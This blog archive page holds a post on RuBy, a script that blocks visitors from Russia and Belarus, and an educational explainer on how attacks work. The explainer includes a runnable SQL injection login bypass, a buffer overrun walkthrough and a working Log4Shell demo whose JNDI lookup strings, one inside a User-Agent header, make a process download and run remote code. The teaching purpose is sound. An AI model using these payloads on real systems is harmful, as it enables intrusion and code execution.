RuBy – Blocking Russia and Belarus

The Internet is a funny place. At the exact same moment that Russian troops are committing war crimes in the real world, Russian users online are just bopping around as if everything is cool. ShutdownHook is anything but a large-scale website, but it does get enough traffic to provide interesting insights in the form of global usage maps. And pretty much every day, browsers from Russia (and very occasionally Belarus) are stopping by to visit.

Well, at least they were until this afternoon. My love for free speech does not extend to aiding and abetting my enemies — and until the people of Russia and Belarus abandon their attacks on Ukraine, I’m afraid that is the best term for what they are. And before you spin up the de rigueur argument about not punishing people for the acts of their government, please just save it. I get the point, but there is nobody on earth that can fix these countries other than their citizens. They do bear responsibility — just as I and my fellow Americans did when we granted a cowardly, bullying toddler the United States’ nuclear codes for four years. Regardless of our individual votes.

Anyways, while I’m certainly not changing the world with my amateur postings here on ShutdownHook, I am trying in a very small way to share ideas and experience that will make folks better engineers and more creative and eclectic individuals. And I just don’t want to share that stuff with people who are, you know, helping to kill families and steal or destroy their homes. Weird, I know.

Enter RuBy — a tiny little web service that detects browsers from these two countries and replaces site content with a static Ukrainian Flag. You can add it to your web site too, and I hope you will. All it takes is one line anywhere on your site:

 <script src="https://shutdownapps.duckdns.org:7076/ruby.js" type="text/javascript" defer></script>

It’s not perfect — the same VPN functionality that folks use to stream The Great Pottery Throw Down before it’s available in the States will foil my script. But that’s fine — the point is to send a general message that these users are not welcome to participate in civilized company, and I think it does the trick.

If you’d rather not use the script from my server, the code is freely available on github — go nuts. I’ll cover all the details in this post, so keep on reading.

Geolocation Basics

Image credit Wikipedia

Geolocation is a general term for a bunch of different ways to figure out where a particular device exists in the real world. The most precise of these is embedded GPS. Pretty much all of our phones can receive signals from the GPS satellite network and use that information to understand where they are — it’s how Google Maps shows your position as you sit in traffic during your daily commute. It’s amazing technology, and the speed with which we’ve become dependent on it is stunning.

Most other approaches to positioning are similar; they rely on databases that map some type of identifiable signal to known locations. For your phone that might be cell towers, each of which broadcasts a unique identifier. Combining this data (e.g., from opencellid.org) with real-time signal strength can give some pretty accurate results. You can do the same thing with a location-aware database of wifi networks like the one at wigle.net (the nostalgia behind “wardriving” is strong for this nerd). Even the old WWII-era LORAN system basically worked this way.

But the grand-daddy of location techniques on the Internet is IP-based geolocation, and it remains the most common for locating far-away clients without access to signal-based data. Each device on the Internet has an “IP Address” used to route messages — you can see yours at https://whatsmyip.com/ (ok technically that’s probably your router’s address, but close enough). This address is visible to both sides of a TCP/IP exchange (like a browser making a request to a web server), so if the server has access to a location-aware database of IP addresses, it can estimate the browser’s real-world location. The good folks at ip2location.com have been maintaining exactly this database for years, and insanely they still make a version available for free at https://lite.ip2location.com/.

The good news for IP-based geolocation is that it’s hard to technically spoof an IP address. The bad news is that it’s easy to insert devices between your browser and a server, so spoofing isn’t really even required to hide yourself. The most common approach is to use a virtual private network (“VPN”). With a VPN your browser doesn’t directly connect to the web server at all — instead, it connects to a VPN server and asks it to talk to the real server on your behalf. As far as the server is concerned, you live wherever your VPN server lives.

There are whole companies like NordVPN that deliver VPN services. They maintain thousands of VPN servers — one click makes your browser appear to be anywhere in the world. Great for getting around regional streaming restrictions! And to be fair, a really good way to increase your privacy profile on the Internet. But still, just a teeny bit shady.

Geo-Blocking

There are a few ways to use IP-based location data to restrict who is allowed to visit a website. Most commercial or high-traffic sites sit behind some kind of a firewall, gateway or proxy, and most of these can automatically block traffic using location-based rules. This is actually pretty common, in particular to protect against countries (you know who you are) that tend to be havens for bad actors. Cloud providers like Azure and AWS are making this kind of protection more and more accessible, which is a great thing.

Another approach is to implement blocking at the application level, which is what I’ve done with RuBy. In theory this is super-simple, but there are some interesting quirks of the IP addressing landscape that make it worth some explanation.

But first a quick side note — there are no new ideas, and it turns out that I’m not the only person to have come up with this one. The folks over at redirectrussia.org have a script as well — it’s a little more complicated than mine, and a bit smarter — e.g., they limit web service calls by doing a first check on the browser’s timezone setting. They also allow the site owner to redirect blocked clients to a site of their choosing, whereas I just slap a flag over the page and call game over. Whichever you pick, you’re doing a solid for the good guys.

RuBy as a Web Service

Using the web service is about as simple as it gets; just add that one-line script fragment anywhere on your page and you’re done. Under the covers, what happens is this:

  • The browser fetches some javascript from the URL at https://shutdownapps.duckdns.org:7076/ruby.js. Note the “defer” attribute on the tag; this instructs the browser to load the script asynchronously and delay execution until the rest of the page is loaded. This avoids any performance impact for pages using the script.
  • The web service examines the incoming IP address and compares it to a list of known address ranges coming from Russia and Belarus. If the IP is not in one of those ranges, an empty script is returned and the page renders / behaves normally.
  • If the IP is in one of those ranges, the returned script replaces the HTML of the page with a full-window rendering of the Ukrainian flag (complete with official colors #005BBB and #FFD500). I considered redirecting to another site, but preferred the vibe of fully dead-ending the page. (There’s a rough sketch of this flow just below.)
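
Here’s that sketch: a minimal stand-in using the JDK’s built-in HTTP server. Assumptions on my part: plain HTTP rather than the real HTTPS endpoint, and an isBlocked() stub in place of the IP-range lookup covered later in the post.

import java.io.IOException;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;
import com.sun.net.httpserver.HttpServer;

public class RubyServerSketch {

    // JS that paints the whole page as the Ukrainian flag (official colors)
    private static final String FLAG_SCRIPT =
        "document.documentElement.innerHTML = '" +
        "<div style=\"position:fixed;top:0;left:0;width:100%;height:50%;background:#005BBB\"></div>" +
        "<div style=\"position:fixed;top:50%;left:0;width:100%;height:50%;background:#FFD500\"></div>';";

    public static void main(String[] args) throws IOException {
        HttpServer server = HttpServer.create(new InetSocketAddress(7076), 0);

        server.createContext("/ruby.js", exchange -> {
            String ip = exchange.getRemoteAddress().getAddress().getHostAddress();
            String js = isBlocked(ip) ? FLAG_SCRIPT : ""; // empty script == page behaves normally
            byte[] body = js.getBytes(StandardCharsets.UTF_8);
            exchange.getResponseHeaders().set("Content-Type", "text/javascript");
            exchange.sendResponseHeaders(200, body.length == 0 ? -1 : body.length);
            try (OutputStream out = exchange.getResponseBody()) { out.write(body); }
        });

        server.start();
    }

    // Stand-in for the real lookup against the IP2Location ranges (see below)
    private static boolean isBlocked(String ip) { return false; }
}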

Most systems can pretty easily add script tags to template pages. For ShutdownHook it was a little harder because I was using a subscription plan at WordPress.com that doesn’t allow it. This isn’t a problem if you’re on the “business” plan (I chose to upgrade), hosting the WordPress software yourself, or anywhere else that allows plugins. After upgrading, I used the very nice “Insert Headers and Footers” plugin to insert the script tag into the HEAD section of my pages.

And really, that’s it. Done and done.

RuBy Under the Covers

The lookup code itself lives in RuBy.java. It depends on access to the IP2Location Lite “DB1” database; in particular the IPV6 / CSV version. Now, there are tons of ready-to-go libraries for working with this database, including for Java. I chose to implement my own because RuBy has very specific, simple requirements that lend themselves to a more space- and time-efficient implementation than a general-purpose library. A classic engineering tradeoff — are those benefits worth the costs of implementation and code ownership? In my case I think so, because I’m running the service for free and want to keep hardware costs to a minimum, but there are definitely arguments on both sides.

In a nutshell, RuBy is configured with a database file and a list of countries to block (specified as ISO-3166 alpha-2 codes). It makes a number of assumptions about the format of the data file (listed at the top of the source file), so be careful if you use another data source. Only matching ranges are loaded into an array sorted by the start of the range, and queries are handled by binary-searching into the array to find a potentially matching range and then checking its bounds. For Russia and Belarus, this ends up holding only about 18,000 records in memory, so resource use is pretty trivial.
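
In case it helps, here’s a sketch of that lookup structure. It’s not the actual RuBy.java (which also handles loading and filtering the CSV), just the core idea:

import java.math.BigInteger;
import java.util.ArrayList;
import java.util.List;

// Sketch of the range lookup: ranges sorted by starting address, binary search
// for the closest range starting at or below the query, then check the bound.
public class RangeLookup {

    private static class Range {
        final BigInteger start, end;
        final String country;
        Range(BigInteger start, BigInteger end, String country) {
            this.start = start; this.end = end; this.country = country;
        }
    }

    private final List<Range> ranges = new ArrayList<>();

    // Caller adds only ranges for blocked countries, in ascending start order
    public void addRange(BigInteger start, BigInteger end, String country) {
        ranges.add(new Range(start, end, country));
    }

    // Returns the blocked country code, or null if the address isn't in any range
    public String lookup(BigInteger address) {
        int lo = 0, hi = ranges.size() - 1, candidate = -1;

        while (lo <= hi) {
            int mid = (lo + hi) / 2;
            if (ranges.get(mid).start.compareTo(address) <= 0) { candidate = mid; lo = mid + 1; }
            else { hi = mid - 1; }
        }

        if (candidate == -1) return null;
        Range r = ranges.get(candidate);
        return (address.compareTo(r.end) <= 0) ? r.country : null;
    }
}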

IP addressing does get a little complicated though; converting text-based addresses to the integer values in the lookup array can be tricky.

Once upon a time we all used “v4” addresses, which you’ve surely seen and look like this: 127.0.0.1. Each of the four numbers is a byte value from 0-255, so there are 8 * 4 = 32 bits available for a total of about 4.3 billion unique addresses. Converting these to a number is a simple matter that will look familiar to anyone who ever had to implement “atoi” in an interview setting:

a.b.c.d = (16777216 * a) + (65536 * b) + (256 * c) + d
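
In Java, that conversion is a short loop. A minimal sketch, assuming well-formed input:

// Convert a dotted-quad v4 address to its integer value, exactly per the
// formula above: shift left one byte, then add the next octet.
static long ipv4ToLong(String address) {
    long value = 0;
    for (String octet : address.split("\\.")) {
        value = (value * 256) + Integer.parseInt(octet);
    }
    return value; // ipv4ToLong("127.0.0.1") == 2130706433
}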

Except, oops, it turns out that the Internet uses way more than 4.3 billion addresses. Back a few years ago this was the source of much hand-wringing and in fact the last IPv4 addresses were allocated to regional registries more than a decade ago. The long-term solution to the problem was to create “v6” addressing which uses 128 bits and can assign a unique address to a solid fraction of all the atoms that make up planet Earth. They’re pretty ugly (e.g., 2001:0db8:85a3:0000:0000:8a2e:0370:7334), but they do the trick.

Sadly though, change is hard, and IPv4 has stubbornly refused to die — only something like 20-40% of the traffic on the Internet is currently using IPv6. Mostly this is because somebody invented NAT (Network Address Translation) — a simple technique that allows all of the dozens of network devices in your house or workplace to share a single public IP address. So at least for the foreseeable future, we’ll be living in a world where both versions are out in the wild.

To get the most coverage, we use the IP2Location database that includes both v4 and v6 addresses. All of the range values in this database are specified as v6 values, which we can manage because a v4 address can be converted to v6 just by adding “::FFFF:” to the front. This amounts to adding an offset of 281,470,681,743,360 to its natural value — you can see this and the other gyrations we do in the addressToBigInteger method (and for kicks its reverse in bigIntegerToAddress).
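
Here’s a sketch of that mapping (not the real addressToBigInteger, just the idea), reusing the ipv4ToLong sketch from above:

import java.math.BigInteger;

// "::FFFF:" as an integer offset: 0xFFFF shifted left 32 bits,
// i.e. 281,470,681,743,360
static final BigInteger V4_OFFSET = new BigInteger("FFFF00000000", 16);

// Map a dotted-quad v4 address into the v6 integer space used by the
// combined IP2Location database.
static BigInteger v4AsV6Integer(String dottedQuad) {
    return V4_OFFSET.add(BigInteger.valueOf(ipv4ToLong(dottedQuad)));
}
// v4AsV6Integer("127.0.0.1") == 281472812449793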

Spread the Word!

Technically, that’s about it — pretty simple at the end of the day. But getting everything lined up cleanly can be a bit of a hassle; I hope that between the service and the code I’ve made it a little easier.

Most importantly, I hope people actually use the code on their own websites. We really are at a critical moment in modern history — are we going to evolve into a global community able to face the big challenges, or will we slide back to 1850 and play pathetic imperialist games until we just extinguish ourselves? My generation hasn’t particularly distinguished itself yet in the face of this stuff, but I’m hopeful that this disaster is blatant enough that we’ll get it right. My call to action:

  • If you run a website, consider blocking pariah nations. You can do this with your firewall or gateway, with the RuBy or Redirect Russia scripts, or just roll your own. The only sites I hope we’ll leave open are the ones that might help citizens in these countries learn the truth about what is really happening.
  • Share this article with colleagues and friends on social media so they can do the same.
  • And even more key, (1) give to causes like MSF that provide humanitarian aid, and (2) make sure our representatives continue supporting Ukraine with lethal aid and punishing Russia/Belarus with increasing sanctions.

If I can help with any of this, just drop me a line and let me know.

Attribution: This site or product includes IP2Location LITE data available from https://lite.ip2location.com.

You got your code in my data, or, how hacks work.

Once upon a time, hacking was easy and cheap entertainment, and we did it all the time:

  • Microsoft’s web server used to just pass URLs through to the file system, so often you could just add “::$DATA” to the end of a URL and read source code.
  • Web server directory browsing was usually enabled, making it super-easy to troll around for config files, backups or other goodies.
  • SQL injection bugs (more on this later) were rampant.
  • A shocking number of servers exposed unsecured pages like /env.php and /test.php.
  • …and many more.

The arms race has spiraled higher and higher since those simple happy days. Today, truly novel technical hacks are pretty rare, but the double-threat of social engineering (phishing, etc.) and sloppy patch management (servers left running with known vulnerabilities) is as common as ever, and so the dance goes on. As I understand it, most of the successful attacks currently being executed by Anonymous against Russia (and frankly bully for that good work) are just old scripts running against poorly-maintained servers. It’s more about saturating the attack space than finding new vulnerabilities.

But per the usual, it’s the technical side that I find endlessly fascinating. And since there’s a pretty big gap between what gets reported on the news (“The Log4j security flaw could impact the entire internet”) and in the security forums (“Apache Log4j2 2.0-beta9 through 2.15.0 excluding security releases 2.12.2, 2.12.3, and 2.3.1 – JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints”), I thought it’d be fun to try to help normal humans understand what’s going on.

Most non-social hacks involve an attacker entering data into a system (using input fields, URLs, etc.) that ends up being executed as code inside that system. Once it’s inside a trusted process, code can do pretty much anything — read and write files, update the environment, make network calls, all kinds of bad stuff. There are approaches to limit the damage, but in most cases it’s Game Over.

Folks trying to hack a particular system will first try to understand the attack surface — that is, all of the ways users can provide input to the system. These can be totally legitimate channels, like a login form on a web site; or accidental ones, like administrative network ports exposed to the public network. Armed with this inventory, hackers attempt to craft data values that allow them to inject and execute code inside the process.

I’m going to dig into three versions of that pattern: SQL Injections, stack-based buffer overruns, and the current bugaboo Log4Shell. There’s a lot here and it’s definitely too long, but I was having too much fun to stop. That said, each of the sections stands alone, so if you have a favorite exploit feel free to jump around!

Note: I am providing real code for two of these; you can totally run it yourself and I hope you will. And before you freak out — nothing I am sharing is remotely novel to the Bad Guys out there. I may have lost some of my Libertarian leanings over the past few years, but I still believe that trying to protect people by hiding facts or knowledge never, ever, ever turns out well in the end. It just cedes power to the wrong side.

1. The Easy One (SQL Injection)

Most of the websites you use every day store their information in databases, or more specifically structured databases that are accessed using a language called SQL. A SQL database keeps information in “tables” which are basically just Excel worksheets — two-dimensional grids in which each row represents an item and each column represents some feature of that item. For example, most systems will have a “users” table that keeps one row for every authorized user. Something like this:

Actually nobody really stores passwords like this unless they are monumentally stupid. And real databases typically contain a bunch of tables with complex relationships between them. But neither of these are important for our purposes here, so I’ve simplified a bit.

Anyways, “SQL” is the language used to add, update and retrieve data in these tables. To retrieve data, you construct a “select” command that specifies which columns and rows you wish to see. For example, if I want to find the email addresses of all administrators in the system, I might execute a command like this:

select email from users where is_admin = true;

Now let’s imagine we’re implementing a login page for a web site. We build an HTML form that has text boxes to enter “username” and “password,” and a “submit” button that sends them to our server. The server then constructs and runs a query such as the following:

select user from users where user = 'USERNAME' and pw = 'PASSWORD'

where USERNAME and PASSWORD represent the values provided by the user. If those values match a row in the database, that row will be returned, and we can grant the user access to the system. If not, zero rows will be returned, and we should instead return a “login failed” error message.

Most websites use something very much like this to manage access. It’s a classic situation in which data (the USERNAME and PASSWORD values) are mixed with code (the rest of the SQL query). As a hacker, is it possible for us to construct data that will change the behavior of the code around it? It turns out that the answer is absolutely yes, unless the developer has taken certain precautions. Let’s see how that works.

Sql.java uses “JDBC” and a (very nice) SQL database called “MySQL” to demonstrate an injection attack. On a system that has git, maven and a JDK installed, build this code as follows:

git clone https://github.com/seanno/shutdownhook.git
cd shutdownhook/hack
mvn clean package

Once built, it creates a table like the one above; you can simulate login attempts like this (using whatever values you like for the user and pass parameters at the end):

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlbad user2 pass2
Logged in as user: user2

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlbad user2 nope
Login failed.

The code that constructs the query is at line 47; a simple call to String.format() that inserts the provided username and password into a template SQL string:

String sql = String.format("select user from u where user = '%s' and pw = '%s'", user, password);

So far so good, but watch what happens if we use some slightly unusual parameters:

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlbad "user2' --" nope
Logged in as user: user2

Oh my. Even though we provided an incorrect password, we were able to trick the system into logging us in as user2 (an administrator no less). To understand how this happened, you need to know that SQL commands can contain “comments.” Any characters following “--” in a line of SQL are simply ignored by the interpreter. So if you apply these new input values to the String.format() call, the result is:

select user from u where user = 'user2' -- and pw = 'nope'

Our carefully constructed data values terminate the first quoted string and then cause the rest of the command to be ignored as a comment. Since the command now asks for all rows where user = 'user2' without any reference to the password, the row is faithfully returned, and login is granted. Of course, a hack like this requires knowledge of the query in which the input values will be placed — but thanks to the use of common code and patterns across systems, that is rarely a significant barrier to success.

Fortunately, JDBC (like every SQL library) provides a way for us to prevent attacks like this. The alternate code at line 72 lets us breathe easy again (note we’re specifying sqlgood instead of sqlbad as the first parameter):

$ java -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar \
    com.shutdownhook.hack.App sqlgood "user2' --" passX
Login failed.

Whew! Instead of directly inserting the values into the command, this code uses a “parameterized statement” with placeholders that enable JDBC to construct the final query. These statements “escape” input values so that special characters like the single-quote and comment markers are not erroneously interpreted as code. Some people choose to implement this escaping behavior themselves, but trust me, you don’t want to play that game and get it wrong.
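
For reference, a parameterized version of the login check looks roughly like this. It’s a sketch in the spirit of the sqlgood path, not a copy of the code at line 72:

import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

// The "?" placeholders are bound separately from the SQL text, so quotes and
// comment markers in user input stay data instead of becoming code.
static boolean loginOk(Connection cxn, String user, String password) throws SQLException {
    String sql = "select user from u where user = ? and pw = ?";
    try (PreparedStatement stmt = cxn.prepareStatement(sql)) {
        stmt.setString(1, user);      // "user2' --" is bound as a literal value here
        stmt.setString(2, password);
        try (ResultSet rs = stmt.executeQuery()) {
            return rs.next();         // a row back means the credentials matched
        }
    }
}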

SQL injection was one of the first really “accessible” vulnerabilities — easy to perform and with a big potential payoff. And despite being super-easy to mitigate, it’s still one of the most common ways bad guys get into websites. Crazy.

2. The Grand-Daddy (Buffer Overrun)

In the early 2000s it seemed like every other day somebody found a new buffer overrun bug, usually in Windows or some other Microsoft product (this list isn’t all buffer exploits, but it does give you a sense of the magnitude of the problem). Was that because the code was just bad, or because Windows had such dominant market share that it was the juiciest target? Probably a bit of both. Anyways, at least to me, buffer overrun exploits are some of the most technically interesting hacks out there.

That said, there’s a lot of really grotty code behind them, and modern operating systems make them a lot harder to execute (a good thing). So instead of building a fully-running exploit in this section, I’m going to just talk us through it.

For the type of buffer overrun we’ll dig into, it’s important to understand how a “call stack” works. Programs are built out of “functions” which are small bits of code that each do a particular thing. Functions are given space to store their stuff (local variables) and can call other functions that help them accomplish their purpose. For example, a “stringCopy” function might call a “stringLength” function to figure out how many characters need to be moved. This chain of functions is managed using a data structure called a “call stack” and some magic pointers called “registers”. The stack when function1 is running looks something like this:

The red and green bits make up the “stack frame” for the currently-running function (i.e., function1). The RBP register (in x64 systems) always points to the current stack frame. The first thing in the frame (the red part) is a pointer to the frame for the previous function (not shown) that called function1. The other stuff in the frame (the green part) is where function1’s local variables are stored.

When function1 calls out to function2, a few things happen:

  1. The address of the next instruction in function1 is pushed onto the top of the stack (blue below). This is where execution will resume in function1 after function2 completes.
  2. The current value of RBP is pushed onto the top of the stack (red above blue below).
  3. The RBP register is set to point at this new location on the stack. This “chain” from RBP to RBP lets the system quickly restore things for function1 when function2 completes.
  4. The RSP register is set to point just beyond the amount of space required for function2’s local variables. This is just housekeeping so we know where to do this dance again in case function2 also makes function calls.
  5. Execution starts at the beginning of function2.

I left out some things there, like the way parameters are passed to functions, but it’s good enough. At this point our stack looks like this:

Now, let’s assume that function2 looks something like this (in C, because buffer overruns usually happen in languages like C that have fewer guard rails):

void function2(char *input) {
    char buffer[10];          /* fixed-size buffer on the stack */
    strcpy(buffer, input);    /* no bounds check! */
    /* do something with buffer */
    return;
}

If the input string is less than 10 characters (9 + a terminating null), everything is fine. But what happens if input is longer than this? The strcpy function happily copies over characters until it finds the null terminator, so it will just keep on copying past the space allocated for buffer and destroy anything beyond that in the stack — writing over the saved RBP value, over the return address, maybe even into the local variables further down:

Typically a bug like this just crashes the program, because when function2 returns to its caller, the return address it uses (again in blue, now overwritten by yellow) is now garbage and almost certainly doesn’t point at legitimate code. Back in the good old days before hackers got creative, that was the end of it. A bummer, something to fix, but not a huge deal.

But it turns out that if you know a bug like this exists, you can (carefully) construct an input string that can do very bad things indeed. Your malicious input data must have two special properties:

First, it needs to contain “shellcode” — hacker jargon for a sequence of bytes that is actually code (more specifically, opcodes for the targeted platform) that does your dirty work. Shellcode needs to be pretty small, so usually it just “bootstraps” the real hack. For example, common shellcode downloads and runs a much larger code package from a well-known network server owned by the hacker. The really tricky thing about building shellcode is that it can’t contain any null bytes, because it has to be a valid C string. Most hackers just reuse shellcode that somebody else wrote, which honestly seems less than sporting.

Second, it needs to be constructed so that the bytes that overwrite the return address (blue) point to the shellcode. When function2 completes, the system will dutifully start executing the code pointed to by this location. Doing this was traditionally feasible because the bottom of the stack always starts at a fixed, known address. It follows that whenever function2 is called in a particular context, the value of RBP should be the same as well. So theoretically you could build a fixed input string that looks like the yellow here:

p0wnd! So now we’re hackers, right? Well, not quite. First, finding that fixed address is quite complicated — I won’t go any further down that rabbit hole except to say that whoever figured out noop sleds was brilliant. But much worse for our visions of world domination, today’s operating systems pick a random starting address for the stack each time a process runs, rendering all that work to figure out the magic address useless. For that matter, C compilers now are much better about adding code to detect overruns before they can do damage anyways, so we may not even have gotten that far. But still, pretty cool.

3. The Latest One (Log4Shell)

Last mile folks, I promise — and I hope you’re still with me, because this last hack is a fun one and it’s easy to run yourself. Tons and tons and tons of apps were vulnerable to Log4Shell when it burst onto the scene just a few months ago. This is kind of sad, because it means that we’re all running some pretty old code. But I guess that’s the way the world works, and why there is still a market for COBOL and FORTRAN developers.

It all starts with “logging.” Software systems can be pretty complicated, so it’s useful to have some kind of trail that helps you see what is (or was) happening inside them. There are a few ways of doing this, but the old standby is simply logging — adding code to the system that writes out status messages along the way. This is particularly useful when you’re trying to understand systems in production — e.g., when a user calls and says “I tried to upload a file this morning and it crashed,” reviewing the log history from the time when this happened might give you some insight into what really went wrong.

This seems pretty straightforward, and in fact the JDK natively supports a pretty serviceable set of logging APIs. But of course things never stay simple:

  • Adding logs has a performance impact, so we’d like a way to turn them on or off at runtime, both in terms of the severity of the message (e.g., the difference between very verbose debugging logs and critical error information) and where it comes from (e.g., you might want to turn on logs for just outbound HTTP messages).
  • It’d be nice to control where the log data is saved — a file, a database, a service like Sumo Logic (there is a whole industry around this), whatever.
  • Logs can get pretty big so some kind of rotation or archive strategy would be helpful.
  • The native stuff is slow in some cases, and configuration is unwieldy, and so on.
  • Developers just really like writing developer tools (me too).

A bunch of libraries sprang up to address these gaps — and especially with the advent of dependency-management tools like Maven, the Apache Log4j project quickly became basically ubiquitous in Java applications. As a rule I try to avoid dependencies, but there are some good reasons to accept this one. So it’s everywhere. Like, everywhere. And because it’s used so commonly and serves so many scenarios, Log4j has grown into quite a beast — most folks use a tiny fraction of its features. And that’s kind of fine, except when it’s not.

OK. This one is pretty satisfying to run yourself. First, clone and build the hack app I described in the SQL Injection section earlier. The app includes an old Log4j version that contains the vulnerability, and lets you play with various log messages like this (I’ll explain the trustURLCodebase thing in a bit):

$ java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
    -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar com.shutdownhook.hack.App \
    log 'yo dawg'
11:35:25.029 [main] ERROR com.shutdownhook.hack.Logs - yo dawg

The app uses the default Log4j configuration that adds a timestamp and some other metadata to the message and outputs to the console. Pretty simple so far. Now, one of those features in Log4j is the ability to add specially-formatted tokens in a message that include dynamic data in the output. So for example:

$ java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
    -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar com.shutdownhook.hack.App \
    log 'user = ${env:USER}, java = ${java:version}'
11:42:31.358 [main] ERROR com.shutdownhook.hack.Logs - user = sean, java = Java version 11.0.13

The first token there looks up the environment variable “USER” and inserts the value found (sean). The second one inserts the currently-running Java version. Kind of cool. There are a bunch of different lookup types, and you can add your own too.

If you’re guessing that the source of our hack might be in a lookup, you nailed it. The “JNDI” lookup dynamically loads objects by name from a local or remote directory service. This kind of thing is common in enterprise Java applications — serialized objects are pushed across network wires and reconstituted in other processes. There are a few flavors of how a JNDI lookup can work, but this one in particular works well for our hack:

  • The JNDI lookup references an object stored in a remote LDAP directory server.
  • The entry in LDAP indicates that the object is a “javaNamingReference;” that the class and factory name is “Attack;” and that the code for these objects can be found at a particular URL.
  • Log4j downloads the code from that URL, instantiates the factory object, calls its “getObjectInstance” method, and calls “toString” on the returned object.
  • Boom! Because the code can be downloaded from any URL, if an attacker can trick you into logging a message of their choosing, they can quite easily bootstrap their way into your process. Their toString method can do basically anything it wants.

This is way more impressive when you see it in action. To do that, you’ll need an LDAP server to host the poisoned directory entry. The simplest way I’ve found to do this is by downloading the UnboundID LDAP SDK for Java, which comes with a command-line tool called in-memory-directory-server. Assuming you are still in the “hack” directory where you built the code for this article, this command will put you in business:

PATH_TO_UNBOUNDID_SDK/tools/in-memory-directory-server \
    --baseDN "o=JNDIHack" --port 1234 --ldifFile attack/attack.ldif

You also need an HTTP server hosting the Attack.class binary. In order to keep things simple, I’ve posted a version up on Azure and set javaCodeBase in attack.ldif to point there. Generally though, you shouldn’t be running binaries that are sitting randomly out on the net, even when they were put there by somebody as upstanding and trustworthy as myself. If you want to avoid that, just compile Attack.java with “javac Attack.java,” put the resulting class file up on any web server you control, and update line 13 in attack.ldif to point there instead.
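
If you’re wondering what lives inside a class like that, here’s a rough sketch of the shape of it. The ObjectFactory interface and the details below are my assumptions about how such a class is typically written; the real Attack.java in the repo is the authoritative version:

import java.io.File;
import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;

// Sketch only -- see Attack.java in the repo for the real thing.
public class Attack implements ObjectFactory {

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx,
                                    Hashtable<?, ?> environment) throws Exception {
        // JNDI instantiates this factory from the downloaded class file and asks
        // it for an object; Log4j then calls toString on whatever comes back.
        return new Object() {
            @Override
            public String toString() {
                try {
                    // proof of life: drop a file in /tmp. A real attacker has the
                    // full privileges of your process and can do far worse.
                    File.createTempFile("L33T-", "-shutdownhook", new File("/tmp"));
                }
                catch (Exception e) {
                    // ignore; this is just a demo
                }
                return "nothing to see here";
            }
        };
    }
}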

With the attacker-controlled LDAP and HTTP servers running, execute the hack app with an embedded JNDI lookup in the message:

$ java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
    -cp target/hack-1.0-SNAPSHOT-jar-with-dependencies.jar com.shutdownhook.hack.App \
    log '${jndi:ldap://127.0.0.1:1234/cn%3dAttack%2cou%3dObjects%2co%3dJNDIHack}'
12:22:25.857 [main] ERROR com.shutdownhook.hack.Logs - nothing to see here

And now the kicker:

$ ls -l /tmp/L33T*
-rw------- 1 sean sean 0 Apr  7 12:22 /tmp/L33T-15518763719698030164-shutdownhook

Dang son, now that’s a hack. Simply by logging a completely legit data string, I can force any code from anywhere on the Internet to run in your JVM. The code that returned “nothing to see here” and created a file in your /tmp directory lives right here. Remember that the code runs with full privileges to the process and can do anything it wants. And unlike shellcode, it doesn’t even have to be clever. Yikes.

One caveat: we’re definitely cheating by setting the parameter com.sun.jndi.ldap.object.trustURLCodebase to true. For a long time now (specifically since version 8u191) Java has disabled this behavior by default. So folks running new versions of Java generally weren’t vulnerable to this exact version of the exploit. Unfortunately, it still works for locally sourced classes, and hackers were able to find some commonly-available code that they could trick into bad behavior too. The best description of this that I’ve seen is in the “Exploiting JNDI injections in JDK 1.8.0_191+” section of this article.

But wait a second, there’s one more problem. In my demonstration, we chose the string that gets logged! This doesn’t seem fair either — log messages are created by the application developer, not the end user, so how did the Bad Guys cause those poisoned logs to be sent to Log4j in the first place? This brings us right back to the overarching theme: most effective hacks come from code hiding in input data, and sometimes those input channels aren’t completely obvious.

For example, when your web browser makes a request to a web server, it silently includes a “header” value named “User-Agent” that identifies the browser type and version. Even today, many website bugs are caused by incompatibilities from browser to browser, so web servers almost always log this User-Agent value for debugging purposes. But anyone can make a web request, and they can set the User-Agent field to anything they like.

Smells like disaster for the Good Guys. If we send a User-Agent header like “MyBrowser ${jndi:ldap://127.0.0.1:1234/cn%3dAttack%2cou%3dObjects%2co%3dJNDIHack}”, that string will very very likely be logged, which will kick off the exact remote class loading issue we demonstrated before. And with just a little understanding of how web servers work, you can come up with a ton of other places that will land your poisoned message into logging output. Bummer dude.
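
To make that concrete, here’s the kind of innocent-looking server code that gets burned. This is a hypothetical handler fragment, not something from the hack repo:

import com.sun.net.httpserver.HttpExchange;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class RequestLogger {

    private static final Logger log = LogManager.getLogger(RequestLogger.class);

    // Perfectly reasonable-looking diagnostics...
    static void logRequest(HttpExchange exchange) {
        String userAgent = exchange.getRequestHeaders().getFirst("User-Agent");

        // ...but with a vulnerable Log4j on the classpath, a User-Agent containing
        // ${jndi:ldap://...} turns this one line into remote code execution.
        log.info("request from user-agent: {}", userAgent);
    }
}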

And, scene.

That’s probably enough of this for now. Two takeaways:

  1. For the love of Pete — control your dependencies, have a patching strategy and hire a white hat company to do a penetration test of your network. Don’t think you’re too small to be a target; everyone is a target.
  2. There is just something incredibly compelling about a good hack — figuring out how to make a machine do something it wasn’t designed to do is, plain and simple, good fun. And it will make you a better engineer too. Just don’t give in to the dark side.

As always, feel free to ping me if you have any trouble with the code, find a bug or just have something interesting to say — would love to hear it. Until next time!

Ground-Up with the Bot Framework

It seems I can’t write about code these days without a warmup rant. So feel free to jump directly to the next section if you like. But where’s the fun in that?

